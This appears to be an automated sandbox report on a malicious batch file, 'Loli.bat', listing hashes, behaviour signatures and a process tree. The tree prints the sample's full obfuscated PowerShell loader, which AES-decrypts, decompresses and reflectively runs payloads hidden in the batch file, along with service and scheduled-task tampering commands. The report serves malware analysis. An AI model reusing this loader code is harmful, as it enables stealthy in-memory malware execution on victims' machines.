Analysis
-
max time kernel
34s -
max time network
38s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
11-06-2024 05:12
Static task
static1
Behavioral task
behavioral1
Sample
Loli.bat
Resource
win10v2004-20240508-en
General
-
Target
Loli.bat
-
Size
3.7MB
-
MD5
d13879a71cf3f86abbf94bb742582d55
-
SHA1
c2229a543040cb9103f0d801d4c4098898a23568
-
SHA256
cd7c4a5b2c74494618533506cf4222b1f1f996e8f9fe8a26ccb6d4bbbea30307
-
SHA512
71d4e9170d076323e751555e6aba071a29f36dc0d0623d05e25a68ca7d23ff2b4712508326078ff0e4f2df22937e04dc564446a0607ff138d8ae723cb95c9dc8
-
SSDEEP
49152:TtXlKusExyx1w7TmcgZloR4LN/qr3xz/puUnGJTNbCGLx+:t
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1464 powershell.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2036 sc.exe 4908 sc.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 3520 ipconfig.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1464 powershell.exe 1464 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeShutdownPrivilege 1692 powercfg.exe Token: SeCreatePagefilePrivilege 1692 powercfg.exe Token: SeShutdownPrivilege 1836 powercfg.exe Token: SeCreatePagefilePrivilege 1836 powercfg.exe Token: SeShutdownPrivilege 4548 powercfg.exe Token: SeCreatePagefilePrivilege 4548 powercfg.exe Token: SeDebugPrivilege 1464 powershell.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 1864 wrote to memory of 1692 1864 cmd.exe 83 PID 1864 wrote to memory of 1692 1864 cmd.exe 83 PID 1864 wrote to memory of 1836 1864 cmd.exe 84 PID 1864 wrote to memory of 1836 1864 cmd.exe 84 PID 1864 wrote to memory of 4548 1864 cmd.exe 85 PID 1864 wrote to memory of 4548 1864 cmd.exe 85 PID 1864 wrote to memory of 116 1864 cmd.exe 86 PID 1864 wrote to memory of 116 1864 cmd.exe 86 PID 116 wrote to memory of 3388 116 net.exe 87 PID 116 wrote to memory of 3388 116 net.exe 87 PID 1864 wrote to memory of 3060 1864 cmd.exe 88 PID 1864 wrote to memory of 3060 1864 cmd.exe 88 PID 3060 wrote to memory of 3644 3060 net.exe 89 PID 3060 wrote to memory of 3644 3060 net.exe 89 PID 1864 wrote to memory of 3092 1864 cmd.exe 90 PID 1864 wrote to memory of 3092 1864 cmd.exe 90 PID 3092 wrote to memory of 3472 3092 net.exe 91 PID 3092 wrote to memory of 3472 3092 net.exe 91 PID 1864 wrote to memory of 4736 1864 cmd.exe 92 PID 1864 wrote to memory of 4736 1864 cmd.exe 92 PID 1864 wrote to memory of 4000 1864 cmd.exe 93 PID 1864 wrote to memory of 4000 1864 cmd.exe 93 PID 1864 wrote to memory of 2648 1864 cmd.exe 94 PID 1864 wrote to memory of 2648 1864 cmd.exe 94 PID 1864 wrote to memory of 3520 1864 cmd.exe 95 PID 1864 wrote to memory of 3520 1864 cmd.exe 95 PID 1864 wrote to memory of 2036 1864 cmd.exe 97 PID 1864 wrote to memory of 2036 1864 cmd.exe 97 PID 1864 wrote to memory of 4908 1864 cmd.exe 98 PID 1864 wrote to memory of 4908 1864 cmd.exe 98 PID 1864 wrote to memory of 860 1864 cmd.exe 99 PID 1864 wrote to memory of 860 1864 cmd.exe 99 PID 860 wrote to memory of 4388 860 net.exe 101 PID 860 wrote to memory of 4388 860 net.exe 101 PID 1864 wrote to memory of 1464 1864 cmd.exe 103 PID 1864 wrote to memory of 1464 1864 cmd.exe 103 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\system32\powercfg.exepowercfg /SETACVALUEINDEX SCHEME_CURRENT 545332lkFflRyLgGnYSOYDfxsZEjdYcrqQbeDOdTKhpbUmTVqnOZThcXrsgYpbgHcTBHJbczVZeQndCgfITQkdxiOeNkIfEIbHYbKllokpeUdmJnQZSHiqxYvsTFoRQPuvPGfBvTwFFUZDfCuztImXAKkZFrsGasyozHwdipEYkDLCYSnqkOxhDxVfvfVdBQFmvLdyfrqeenMXYIaM%637-891a-dec35c318583 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
C:\Windows\system32\powercfg.exepowercfg /SETACVALUEINDEX SCHEME_CURRENT 545332SoCiBYevDXNytQknzhzfApYnnVVCmkwYTGLbOjuEYJaXuNJmaFHQwNnCqoUGcCjtAOFMfiypMUhRpbTAlJBGDFCftiLAoOCvAHwFhWgRgrdBGwmoutusaCPVmztXwYaYsLqIFosoCJzlBazXVxfVtjvYRAsIDjuirfiUfEIgagQqcEulZwbZSfFjqrReVKKsor%CGUOIqpvYFJjrCizQCOWNivaFoEsMkzoMbFqaKFBUvEHxylYodTVCjsulTitMXJNguwqXSzfWmbrDNDgcFdIqDMDJkfgBlPXMQAccVbwDNZphaRxqcrgUaxDISHMNsDKxeFMnB%3-ab1c-d1337819c4bb 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
C:\Windows\system32\powercfg.exepowercfg /SETACVALUEINDEX SCHEME_CURRENT e73a04kInqdtwVmxlDtyMwTufViimOdRYEciYZBecoKTcuCsBBprvMirkcjBDbwymmvRSezlcowyLZrLtQHLzMwmwLXVQZBaSlGQZKAxcdogqKFkKyiNuKZAPivggDvcNvFAtBLIpjJvxpVLgNlrQOFimfaQptrzIltVffQiNAxlaEdAnJZsrdmYPwnoAUsWSkNl%eEgcFzJlQYlwNhpJcfdqiVkwGClioMtqRKPYRJAyHGkoYmgtlVQYobxjtKwdoAXeEUFcrqRsFFICKWxuvRXsVvcPnGFgnwjhIgJeHdbUdxtItVywnbHwDEijRPPLLLeivATEmtNrPcpxbtwshiTmONEdXAmRoqjssknSbTjTnqGApKhxsxD%\Users\Admin\AppData\Local\Temp\Loli.bat5-bccc-f7e51960c258 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:4548
-
-
C:\Windows\system32\net.exenet start StateRepository2⤵
- Suspicious use of WriteProcessMemory
PID:116 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start StateRepository3⤵PID:3388
-
-
-
C:\Windows\system32\net.exenet start SystemEventsBroker2⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start SystemEventsBroker3⤵PID:3644
-
-
-
C:\Windows\system32\net.exenet start BrokerInfrastructure2⤵
- Suspicious use of WriteProcessMemory
PID:3092 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start BrokerInfrastructure3⤵PID:3472
-
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\NvTmMon_{B2FE1952-0186-46FQghIPJrGRamxjnXhzAAlWRlDeVAvQiweLhcHvdBQKfWQJnjLiwiCSOIZUDEUiWPJDhMblpMvYKAQVvURLPmuZTmXzcMRzHHOqmmCAiASKMEinSezJMitJuJKVOCjDUVqcMAIirqDouKmpdJHYnhMznfVCCGLFqpPQnfBrvqrwFeoKwuRfVkpMjRPHEfGLEXYfVwbXipDWQqUiQkfhPGKg%-BAEC-A80AA35AC5B8}" /Disable2⤵PID:4736
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}" /Disable2⤵PID:4000
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\NvTmRepOnLogon_{B2FE1952-0YeXroDOTWkjKQoZvxutjLXAspmGsJbYJyraMpYWWSlOKPWAJoyZXkQxaDEccXwkUmzmzonfzywqAjQCsLWdkbazHTZiKVUZwbTyqKbubtAzOAXRNbJqasaSlaEFpevDDxUzpsmHKBcRBBK%86-46C3-BAEC-A80AA35AC5B8}" /Disable2⤵PID:2648
-
-
C:\Windows\system32\ipconfig.exeipconfig /flushDNS2⤵
- Gathers network information
PID:3520
-
-
C:\Windows\system32\sc.exesc config "Netlogon" start= demand2⤵
- Launches sc.exe
PID:2036
-
-
C:\Windows\system32\sc.exesc config "TapiSrv" start= demand2⤵
- Launches sc.exe
PID:4908
-
-
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:4388
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -windowstyle hidden -noprofile -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ILzC72sI+CV50DxRsmoBoJY9fV+QlkwmunrXsniqzqQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4lFDTXtXVKEiJhSo//n7+w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GRjWy=New-Object System.IO.MemoryStream(,$param_var); $TAkbl=New-Object System.IO.MemoryStream; $VWaet=New-Object System.IO.Compression.GZipStream($GRjWy, [IO.Compression.CompressionMode]::Decompress); $VWaet.CopyTo($TAkbl); $VWaet.Dispose(); $GRjWy.Dispose(); $TAkbl.Dispose(); $TAkbl.ToArray();}function execute_function($param_var,$param2_var){ $twtOJ=[System.Reflection.Assembly]::('daoL'[-1..-16] -join '')([byte[]]$param_var); $foYBX=$twtOJ.EntryPoint; $foYBX.Invoke($null, $param2_var);}$dTXhk = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $dTXhk;$JycGo=[System.IO.File]::('txeTllAdaeR'[-1..-16] -join '')($dTXhk).Split([Environment]::NewLine);foreach ($IUEkA in $JycGo) { if ($IUEkA.StartsWith(':: ')) { $Ngyic=$IUEkA.Substring(3); break; }}$payloads_var=[string[]]$Ngyic.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82